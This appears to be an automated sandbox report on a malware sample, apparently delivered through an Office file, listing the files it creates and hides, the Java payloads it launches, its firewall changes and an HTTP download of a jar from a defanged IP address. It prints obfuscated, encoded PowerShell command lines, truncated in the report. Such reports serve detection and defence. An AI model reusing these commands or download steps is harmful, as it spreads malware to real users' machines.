Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' /c pO^w^Ers^hE^Ll -e WwBzAHkAcwB0AGUAbQAuAFQAZQBYAFQALgBFAE4AQwBPAEQAaQBOAGcAXQA6ADoAdQBuAGkAYwBPAGQAZQAuAGcARQB0AFMAdAByAGkAbgBHACgAWwBTAHkAUwB0AEUAbQAuAEMAbwBOAFYARQByAHQAXQA6ADoARgByAE8ATQBC...
Modifies file system
Creates the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{c53a5147-3c04-4a88-ac62-e6e454c2223e}.tmp
- %APPDATA%\kujipemgkw.txt
- %APPDATA%\ingtnrmrm.txt
- %APPDATA%\cvsqsjno.txt
- %APPDATA%\xldrneazsg.txt
- %APPDATA%\eldslnznex.txt
- %APPDATA%\zfcdvwjdv.txt
- %HOMEPATH%\woobmdsaea.js
- %TEMP%\bit241.tmp
- %TEMP%\bit231.tmp
- %TEMP%\bitfe67.tmp
- %TEMP%\bitfcef.tmp
- %TEMP%\bitbb6e.tmp
- %TEMP%\bitbb90.tmp
- %TEMP%\bitbb6d.tmp
- %TEMP%\bitbb7f.tmp
- %TEMP%\bit6a72.tmp
- %APPDATA%\aiotoaocyk.txt
Sets the 'hidden' attribute to the following files
- %TEMP%\bitbb90.tmp
- %TEMP%\bitbb6e.tmp
- %TEMP%\bitbb7f.tmp
- %TEMP%\bitbb6d.tmp
- %TEMP%\bitfcef.tmp
- %TEMP%\bitfe67.tmp
- %TEMP%\bit241.tmp
- %TEMP%\bit231.tmp
- %TEMP%\bit6a72.tmp
Moves the following files
- from %TEMP%\bitbb6e.tmp to %TEMP%\roh_98hq_yo.jar
- from %TEMP%\bitbb7f.tmp to %TEMP%\roh_98hq_yo.jar
- from %TEMP%\bitbb90.tmp to %TEMP%\roh_98hq_yo.jar
- from %TEMP%\bitbb6d.tmp to %TEMP%\roh_98hq_yo.jar
- from %TEMP%\bitfcef.tmp to %TEMP%\roh_98hq_yo.jar
- from %TEMP%\bit241.tmp to %TEMP%\roh_98hq_yo.jar
- from %TEMP%\bitfe67.tmp to %TEMP%\roh_98hq_yo.jar
- from %TEMP%\bit231.tmp to %TEMP%\roh_98hq_yo.jar
Substitutes the following files
- %TEMP%\roh_98hq_yo.jar
Network activity
TCP
HTTP GET requests
- http://21#.#70.114.83/calc/mon.jar
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\wscript.exe' %HOMEPATH%\woobmdsaea.js
- '<SYSTEM32>\cmd.exe' /c pO^w^Ers^hE^Ll -e WwBzAHkAcwB0AGUAbQAuAFQAZQBYAFQALgBFAE4AQwBPAEQAaQBOAGcAXQA6ADoAdQBuAGkAYwBPAGQAZQAuAGcARQB0AFMAdAByAGkAbgBHACgAWwBTAHkAUwB0AEUAbQAuAEMAbwBOAFYARQByAHQAXQA6ADoARgByAE8ATQBC...' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\aoueixjj.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\whhahzlyzd.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\jmnyauaw.txt"
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%ProgramFiles%\java\jre1.8.0_45\...
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\xldrneazsg.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\aiotoaocyk.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\java.exe' -jar "%HOMEPATH%\zfcdvwjdv.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\eldslnznex.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\ingtnrmrm.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\kujipemgkw.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\zfcdvwjdv.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%TEMP%\Roh_98Hq_yO.jar"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e WwBzAHkAcwB0AGUAbQAuAFQAZQBYAFQALgBFAE4AQwBPAEQAaQBOAGcAXQA6ADoAdQBuAGkAYwBPAGQAZQAuAGcARQB0AFMAdAByAGkAbgBHACgAWwBTAHkAUwB0AEUAbQAuAEMAbwBOAFYARQByAHQAXQA6ADoARgByAE8ATQBCAEEAUwBlADYANABTAF...
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%APPDATA%\cvsqsjno.txt"
- '%ProgramFiles%\java\jre1.8.0_45\bin\java.exe' -jar "%HOMEPATH%\aoueixjj.txt"
